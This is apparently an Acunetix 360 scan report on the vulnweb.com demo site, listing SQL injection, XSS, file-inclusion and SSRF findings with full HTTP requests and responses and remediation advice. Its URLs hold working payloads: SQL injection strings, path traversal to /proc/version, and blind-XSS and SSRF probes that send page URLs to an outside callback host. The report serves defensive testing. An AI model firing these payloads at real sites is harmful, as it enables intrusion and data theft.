Acunetix 360 Scan Report for http://testphp.vulnweb.com/login.php

VULNERABILITY	METHOD	URL	SEVERITY
Local File Inclusion	GET	http://testphp.vulnweb.com/showimage.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion&size=160	HIGH
[Possible] Cross-site Request Forgery	GET	http://testphp.vulnweb.com/guestbook.php	LOW
[Possible] Cross-site Request Forgery in Login Form	GET	http://testphp.vulnweb.com/login.php	LOW
Password Transmitted over HTTP	GET	http://testphp.vulnweb.com/login.php	HIGH
SSL/TLS Not Implemented	GET	https://testphp.vulnweb.com/login.php	MEDIUM
Boolean Based SQL Injection	POST	http://testphp.vulnweb.com/userinfo.php	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	POST	http://testphp.vulnweb.com/userinfo.php	CRITICAL
Boolean Based SQL Injection	GET	http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20OR%2017-7%3d10	CRITICAL
Boolean Based SQL Injection	POST	http://testphp.vulnweb.com/secured/newuser.php	CRITICAL
[Probable] SQL Injection	GET	http://testphp.vulnweb.com/listproducts.php?cat=%2527	CRITICAL
[Probable] SQL Injection	GET	http://testphp.vulnweb.com/listproducts.php?artist=%2527	CRITICAL
[Probable] SQL Injection	POST	http://testphp.vulnweb.com/secured/newuser.php	CRITICAL
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/guestbook.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/comment.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/search.php?test=query	HIGH
Blind Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3CiMg%20src%3dN%20onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhf38ytd-0om6dzhiuojkk6hpscxv5k_e%27%2b%27-uw.r87.me%2fr%2f%3f%27%2blocation.href%22%3E	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/guestbook.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Blind Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfh_mvyem9jiu6pkg3uimc6ni-yncpmf%27%2b%27_im.r87.me%2fr%2f%3f%27%2blocation.href%22%3E&pp=12	HIGH
Blind Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/search.php?test=query	HIGH
Cross-site Scripting	GET	http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x017899)%3c%2fscRipt%3e	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/guestbook.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/guestbook.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/secured/newuser.php	HIGH
Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x019E8E)%20x%3d%22	HIGH
Cross-site Scripting	GET	http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x01A5D7)%3c%2fscRipt%3e	HIGH
Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x01B20B)%3c%2fscRipt%3e&pp=12	HIGH
Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x01B4B3)%3c%2fscRipt%3e	HIGH
Cross-site Scripting	POST	http://testphp.vulnweb.com/comment.php	HIGH
[Possible] Blind Cross-site Scripting	GET	http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfprld4jzh5kstxkzefmxy15uvp9n0ycavc%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e	HIGH
[Possible] Blind Cross-site Scripting	GET	http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfuzkkgjx4dxqvnxlxcqwvvafpcvaiv5nvo%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e	HIGH
[Possible] Blind Cross-site Scripting	GET	http://testphp.vulnweb.com/hpp/?pp=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fx1wxpcayhfxfh7ipalwl72ygtaqqmftedy9k6k92qzs%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e	HIGH
Cross-site Scripting via Remote File Inclusion	GET	http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160	HIGH
[Possible] Cross-site Scripting	GET	http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x018251)%3C/scRipt%3E&size=160	MEDIUM
[Possible] Insecure Reflected Content	GET	http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12	LOW
PHP session.use_only_cookies Is Disabled	GET	http://testphp.vulnweb.com/secured/phpinfo.php	MEDIUM
Cookie Not Marked as HttpOnly	GET	http://testphp.vulnweb.com/AJAX/index.php	LOW
[Possible] Phishing by Navigating Browser Tabs	GET	http://testphp.vulnweb.com/disclaimer.php	LOW
Database Error Message Disclosure	GET	http://testphp.vulnweb.com/listproducts.php?cat=%2527	LOW
Missing X-Frame-Options Header	GET	http://testphp.vulnweb.com/login.php	LOW
Version Disclosure (PHP)	GET	http://testphp.vulnweb.com/login.php	LOW
Out-of-date Version (PHP)	GET	http://testphp.vulnweb.com/login.php	CRITICAL
[Possible] Server-Side Request Forgery	GET	http://testphp.vulnweb.com/showimage.php?file=http://r87.me/r/?id=x1wxpcayhfvakxhsgrvlwtqedvzmhibr1fjgsoibufw&size=160	MEDIUM

1. [Probable] SQL Injection

CRITICAL

Acunetix 360 identified a Probable SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Even though Acunetix 360 believes there is a SQL injection in here, it could not confirm it. There can be numerous reasons for Acunetix 360 not being able to confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also consider sending the details of this issue to us so we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, updating and deleting arbitrary data/tables from the database.
Executing commands on the underlying operating system.

Vulnerabilities

1.1. http://testphp.vulnweb.com/listproducts.php?artist=%2527

Method	Parameter	Value
GET	artist	%27

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 186.3721

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="A
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:33:54 AM
The Issue was detected during the Scan.	System	8/29/2021 9:11:34 AM
The Issue was detected during the Scan.	System	8/27/2021 8:56:46 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:47 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:18:31 AM

1.2. http://testphp.vulnweb.com/listproducts.php?cat=%2527

Method	Parameter	Value
GET	cat	%27

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 183.1864

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:51:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="A
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:28:21 AM
The Issue was detected during the Scan.	System	8/29/2021 9:05:05 AM
The Issue was detected during the Scan.	System	8/27/2021 8:51:24 AM
The Issue was detected during the Scan.	System	6/9/2021 1:23:49 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:09:11 AM

1.3. http://testphp.vulnweb.com/secured/newuser.php

Method	Parameter	Value
POST	upass
POST	urname
POST	ucc
POST	signup	signup
POST	uphone
POST	uemail
POST	uuname	'%2BNSFTW%2B'
POST	upass2
POST	uaddress

Certainty

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=&urname=&ucc=&signup=signup&uphone=&uemail=&uuname='%2BNSFTW%2B'&upass2=&uaddress=

Response

Response Time (ms) : 187.4397

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	Unable to access user database: Unknown column 'NSFTW' in 'where clause'

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:33:25 AM
The Issue was detected during the Scan.	System	8/29/2021 9:13:43 AM
The Issue was detected during the Scan.	System	8/27/2021 8:55:22 AM
The Issue was detected during the Scan.	System	6/9/2021 1:25:56 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:23:08 AM

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Monitor and review weblogs and application logs to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

2. Boolean Based SQL Injection

CRITICAL

CONFIRMED

Acunetix 360 identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Acunetix 360 to identify and confirm the SQL injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, updating and deleting arbitrary data/tables from the database
Executing commands on the underlying operating system

Vulnerabilities

2.1. http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	artist	1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /artists.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 182.6617

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>artists</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan. The State was set to Present	System	6/9/2021 1:44:14 PM

2.2. http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	artist	1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 182.3752

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="A
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan.	System	6/9/2021 1:44:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:28 AM

2.3. http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	cat	1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 209.1233

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:51:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="A
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:47 AM
The Issue was detected during the Scan.	System	6/9/2021 1:44:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:35:27 AM

2.4. http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	id	-1 OR 17-7=10

Proof of Exploit

Identified Database Name (cached)

acuart

Identified Database User (cached)

acuart@loca  o

Identified Database Version (cached)

8.0.22-0ub     .20.04.2

Request Response Go to the highlighted output

Request

GET /Mod_Rewrite_Shop/buy.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 179.8943

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:28 GMT

<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan.	System	8/27/2021 9:05:48 AM
